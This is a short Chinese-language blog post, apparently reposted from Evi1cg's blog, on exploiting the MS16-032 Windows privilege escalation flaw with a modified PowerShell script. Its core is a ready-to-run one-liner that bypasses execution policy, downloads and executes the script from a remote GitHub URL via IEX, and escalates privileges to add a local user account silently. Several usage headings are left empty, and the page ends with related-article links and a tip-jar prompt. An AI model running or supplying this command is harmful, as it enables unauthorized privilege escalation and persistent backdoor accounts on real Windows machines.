exploit-db的详情：

https://www.exploit-db.com/exploits/39574/

试用系统：

Tested on x32 Win7, x64 Win8, x64 2k12R2

提权powershell脚本：

Invoke-MS16-032.ps1

测试详情：

为了方便使用，对这个脚本进行了简单的修改，可以执行任意程序，并可以添加参数执行（全程无弹框）脚本地址为：

Invoke-MS16-032.ps1

使用方式如下:

添加用户：

运行某程序：

远程加用户：

直接执行如下命令，可进行提权并添加用户：

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user evi1cg test123 /add'"

文章出处：Evi1cg's blog

https://evi1cg.me/archives/MS16-032-Windows-Privilege-Escalation.html

你可能喜欢

优质内容筛选与推荐>>
1、精通Windows API --- 线程同步控制源码
2、细嚼慢咽C++primer（4）——类（1）：构造函数，类型别名
3、CSS画各种二维图形
4、vue-tinymce webpack 封装完美结合先上全部代码
5、做一个不复制粘贴的程序员[0]: 概述

赞赏

长按二维码向我转账

受苹果公司新规定影响，微信 iOS 版的赞赏功能被关闭，可通过二维码转账支持公众号。

阅读

已发送

发送中